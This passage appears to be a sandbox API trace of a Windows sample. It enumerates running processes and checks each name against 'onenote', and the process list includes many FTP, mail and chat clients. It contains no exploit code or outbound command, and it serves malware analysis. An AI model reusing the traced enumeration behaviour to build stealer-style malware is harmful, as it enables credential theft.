[0098.034] StrStrIA (lpFirst="registered try.exe", lpSrch="onenote") returned 0x0 [0098.034] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="consultancy statute ide.exe")) returned 1 [0098.035] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="consultancy statute ide.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0098.035] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x356b6e0 [0098.036] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="consultancy statute ide.exe", cchWideChar=-1, lpMultiByteStr=0x356b6e0, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="consultancy statute ide.exe", lpUsedDefaultChar=0x0) returned 28 [0098.036] lstrcpyA (in: lpString1=0x567fabc, lpString2="consultancy statute ide.exe" | out: lpString1="consultancy statute ide.exe") returned="consultancy statute ide.exe" [0098.036] StrStrIA (lpFirst="consultancy statute ide.exe", lpSrch="onenote") returned 0x0 [0098.036] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x67c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="invite.exe")) returned 1 [0098.037] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="invite.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0098.037] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3579cf8 [0098.037] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="invite.exe", cchWideChar=-1, lpMultiByteStr=0x3579cf8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="invite.exe", lpUsedDefaultChar=0x0) returned 11 [0098.037] lstrcpyA (in: lpString1=0x567fabc, lpString2="invite.exe" | out: lpString1="invite.exe") returned="invite.exe" [0098.037] StrStrIA (lpFirst="invite.exe", lpSrch="onenote") returned 0x0 [0098.037] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="idol.exe")) returned 1 [0098.038] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="idol.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0098.038] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3579bc0 [0098.038] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="idol.exe", cchWideChar=-1, lpMultiByteStr=0x3579bc0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="idol.exe", lpUsedDefaultChar=0x0) returned 9 [0098.038] lstrcpyA (in: lpString1=0x567fabc, lpString2="idol.exe" | out: lpString1="idol.exe") returned="idol.exe" [0098.038] StrStrIA (lpFirst="idol.exe", lpSrch="onenote") returned 0x0 [0098.038] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="latitude qualifications.exe")) returned 1 [0098.039] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="latitude qualifications.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0098.039] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x356b410 [0098.039] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="latitude qualifications.exe", cchWideChar=-1, lpMultiByteStr=0x356b410, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="latitude qualifications.exe", lpUsedDefaultChar=0x0) returned 28 [0098.039] lstrcpyA (in: lpString1=0x567fabc, lpString2="latitude qualifications.exe" | out: lpString1="latitude qualifications.exe") returned="latitude qualifications.exe" [0098.040] StrStrIA (lpFirst="latitude qualifications.exe", lpSrch="onenote") returned 0x0 [0098.040] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="lauderdaletransmittedwasher.exe")) returned 1 [0098.041] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lauderdaletransmittedwasher.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0098.041] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x356b5c8 [0098.041] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lauderdaletransmittedwasher.exe", cchWideChar=-1, lpMultiByteStr=0x356b5c8, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lauderdaletransmittedwasher.exe", lpUsedDefaultChar=0x0) returned 32 [0098.041] lstrcpyA (in: lpString1=0x567fabc, lpString2="lauderdaletransmittedwasher.exe" | out: lpString1="lauderdaletransmittedwasher.exe") returned="lauderdaletransmittedwasher.exe" [0098.041] StrStrIA (lpFirst="lauderdaletransmittedwasher.exe", lpSrch="onenote") returned 0x0 [0098.041] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="powell_jane.exe")) returned 1 [0098.042] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="powell_jane.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0098.042] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3579c98 [0098.042] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="powell_jane.exe", cchWideChar=-1, lpMultiByteStr=0x3579c98, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="powell_jane.exe", lpUsedDefaultChar=0x0) returned 16 [0098.042] lstrcpyA (in: lpString1=0x567fabc, lpString2="powell_jane.exe" | out: lpString1="powell_jane.exe") returned="powell_jane.exe" [0098.042] StrStrIA (lpFirst="powell_jane.exe", lpSrch="onenote") returned 0x0 [0098.042] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="laboratorysaving.exe")) returned 1 [0098.043] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="laboratorysaving.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0098.043] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x357ad98 [0098.043] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="laboratorysaving.exe", cchWideChar=-1, lpMultiByteStr=0x357ad98, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="laboratorysaving.exe", lpUsedDefaultChar=0x0) returned 21 [0098.043] lstrcpyA (in: lpString1=0x567fabc, lpString2="laboratorysaving.exe" | out: lpString1="laboratorysaving.exe") returned="laboratorysaving.exe" [0098.043] StrStrIA (lpFirst="laboratorysaving.exe", lpSrch="onenote") returned 0x0 [0098.044] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x798, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="gainedshape.exe")) returned 1 [0098.045] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gainedshape.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0098.045] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3579cb0 [0098.045] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gainedshape.exe", cchWideChar=-1, lpMultiByteStr=0x3579cb0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gainedshape.exe", lpUsedDefaultChar=0x0) returned 16 [0098.045] lstrcpyA (in: lpString1=0x567fabc, lpString2="gainedshape.exe" | out: lpString1="gainedshape.exe") returned="gainedshape.exe" [0098.045] StrStrIA (lpFirst="gainedshape.exe", lpSrch="onenote") returned 0x0 [0098.045] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="opens-versions.exe")) returned 1 [0098.046] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="opens-versions.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0098.046] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x357add8 [0098.046] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="opens-versions.exe", cchWideChar=-1, lpMultiByteStr=0x357add8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="opens-versions.exe", lpUsedDefaultChar=0x0) returned 19 [0098.046] lstrcpyA (in: lpString1=0x567fabc, lpString2="opens-versions.exe" | out: lpString1="opens-versions.exe") returned="opens-versions.exe" [0098.046] StrStrIA (lpFirst="opens-versions.exe", lpSrch="onenote") returned 0x0 [0098.046] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="workers_dedicated_alloy.exe")) returned 1 [0098.047] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="workers_dedicated_alloy.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0098.047] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x356b618 [0098.047] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="workers_dedicated_alloy.exe", cchWideChar=-1, lpMultiByteStr=0x356b618, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="workers_dedicated_alloy.exe", lpUsedDefaultChar=0x0) returned 28 [0098.047] lstrcpyA (in: lpString1=0x567fabc, lpString2="workers_dedicated_alloy.exe" | out: lpString1="workers_dedicated_alloy.exe") returned="workers_dedicated_alloy.exe" [0098.047] StrStrIA (lpFirst="workers_dedicated_alloy.exe", lpSrch="onenote") returned 0x0 [0098.047] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x29c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0098.049] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="3dftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0098.049] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3579d28 [0098.049] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="3dftp.exe", cchWideChar=-1, lpMultiByteStr=0x3579d28, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="3dftp.exe", lpUsedDefaultChar=0x0) returned 10 [0098.049] lstrcpyA (in: lpString1=0x567fabc, lpString2="3dftp.exe" | out: lpString1="3dftp.exe") returned="3dftp.exe" [0098.049] StrStrIA (lpFirst="3dftp.exe", lpSrch="onenote") returned 0x0 [0098.049] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x888, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0098.050] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="absolutetelnet.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0098.050] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x357b018 [0098.050] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="absolutetelnet.exe", cchWideChar=-1, lpMultiByteStr=0x357b018, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="absolutetelnet.exe", lpUsedDefaultChar=0x0) returned 19 [0098.050] lstrcpyA (in: lpString1=0x567fabc, lpString2="absolutetelnet.exe" | out: lpString1="absolutetelnet.exe") returned="absolutetelnet.exe" [0098.050] StrStrIA (lpFirst="absolutetelnet.exe", lpSrch="onenote") returned 0x0 [0098.050] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x564, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0098.052] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="alftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0098.052] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3579e48 [0098.052] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="alftp.exe", cchWideChar=-1, lpMultiByteStr=0x3579e48, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="alftp.exe", lpUsedDefaultChar=0x0) returned 10 [0098.052] lstrcpyA (in: lpString1=0x567fabc, lpString2="alftp.exe" | out: lpString1="alftp.exe") returned="alftp.exe" [0098.052] StrStrIA (lpFirst="alftp.exe", lpSrch="onenote") returned 0x0 [0098.052] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0098.053] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="barca.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0098.053] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3579ce0 [0098.053] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="barca.exe", cchWideChar=-1, lpMultiByteStr=0x3579ce0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="barca.exe", lpUsedDefaultChar=0x0) returned 10 [0098.053] lstrcpyA (in: lpString1=0x567fabc, lpString2="barca.exe" | out: lpString1="barca.exe") returned="barca.exe" [0098.053] StrStrIA (lpFirst="barca.exe", lpSrch="onenote") returned 0x0 [0098.053] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0098.054] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="bitkinex.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0098.054] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3579d40 [0098.054] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="bitkinex.exe", cchWideChar=-1, lpMultiByteStr=0x3579d40, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bitkinex.exe", lpUsedDefaultChar=0x0) returned 13 [0098.054] lstrcpyA (in: lpString1=0x567fabc, lpString2="bitkinex.exe" | out: lpString1="bitkinex.exe") returned="bitkinex.exe" [0098.054] StrStrIA (lpFirst="bitkinex.exe", lpSrch="onenote") returned 0x0 [0098.054] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xca4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0098.055] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="coreftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.055] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3579e60 [0098.056] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="coreftp.exe", cchWideChar=-1, lpMultiByteStr=0x3579e60, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="coreftp.exe", lpUsedDefaultChar=0x0) returned 12 [0098.056] lstrcpyA (in: lpString1=0x567fabc, lpString2="coreftp.exe" | out: lpString1="coreftp.exe") returned="coreftp.exe" [0098.056] StrStrIA (lpFirst="coreftp.exe", lpSrch="onenote") returned 0x0 [0098.056] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0098.057] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="far.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0098.057] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x3574f20 [0098.057] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="far.exe", cchWideChar=-1, lpMultiByteStr=0x3574f20, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="far.exe", lpUsedDefaultChar=0x0) returned 8 [0098.057] lstrcpyA (in: lpString1=0x567fabc, lpString2="far.exe" | out: lpString1="far.exe") returned="far.exe" [0098.057] StrStrIA (lpFirst="far.exe", lpSrch="onenote") returned 0x0 [0098.057] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0098.058] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="filezilla.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0098.058] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3579e90 [0098.058] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="filezilla.exe", cchWideChar=-1, lpMultiByteStr=0x3579e90, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="filezilla.exe", lpUsedDefaultChar=0x0) returned 14 [0098.058] lstrcpyA (in: lpString1=0x567fabc, lpString2="filezilla.exe" | out: lpString1="filezilla.exe") returned="filezilla.exe" [0098.058] StrStrIA (lpFirst="filezilla.exe", lpSrch="onenote") returned 0x0 [0098.058] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0098.059] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="flashfxp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0098.060] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3579ba8 [0098.060] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="flashfxp.exe", cchWideChar=-1, lpMultiByteStr=0x3579ba8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="flashfxp.exe", lpUsedDefaultChar=0x0) returned 13 [0098.060] lstrcpyA (in: lpString1=0x567fabc, lpString2="flashfxp.exe" | out: lpString1="flashfxp.exe") returned="flashfxp.exe" [0098.060] StrStrIA (lpFirst="flashfxp.exe", lpSrch="onenote") returned 0x0 [0098.060] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0098.061] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fling.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0098.061] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3579bd8 [0098.061] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fling.exe", cchWideChar=-1, lpMultiByteStr=0x3579bd8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fling.exe", lpUsedDefaultChar=0x0) returned 10 [0098.061] lstrcpyA (in: lpString1=0x567fabc, lpString2="fling.exe" | out: lpString1="fling.exe") returned="fling.exe" [0098.061] StrStrIA (lpFirst="fling.exe", lpSrch="onenote") returned 0x0 [0098.061] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x394, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0098.062] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="foxmailincmail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0098.062] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x357ac98 [0098.062] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="foxmailincmail.exe", cchWideChar=-1, lpMultiByteStr=0x357ac98, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="foxmailincmail.exe", lpUsedDefaultChar=0x0) returned 19 [0098.062] lstrcpyA (in: lpString1=0x567fabc, lpString2="foxmailincmail.exe" | out: lpString1="foxmailincmail.exe") returned="foxmailincmail.exe" [0098.063] StrStrIA (lpFirst="foxmailincmail.exe", lpSrch="onenote") returned 0x0 [0098.063] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0098.064] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gmailnotifierpro.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0098.064] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x357ae98 [0098.064] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gmailnotifierpro.exe", cchWideChar=-1, lpMultiByteStr=0x357ae98, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gmailnotifierpro.exe", lpUsedDefaultChar=0x0) returned 21 [0098.064] lstrcpyA (in: lpString1=0x567fabc, lpString2="gmailnotifierpro.exe" | out: lpString1="gmailnotifierpro.exe") returned="gmailnotifierpro.exe" [0098.064] StrStrIA (lpFirst="gmailnotifierpro.exe", lpSrch="onenote") returned 0x0 [0098.064] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0098.073] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="icq.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0098.073] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x3574f00 [0098.073] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="icq.exe", cchWideChar=-1, lpMultiByteStr=0x3574f00, 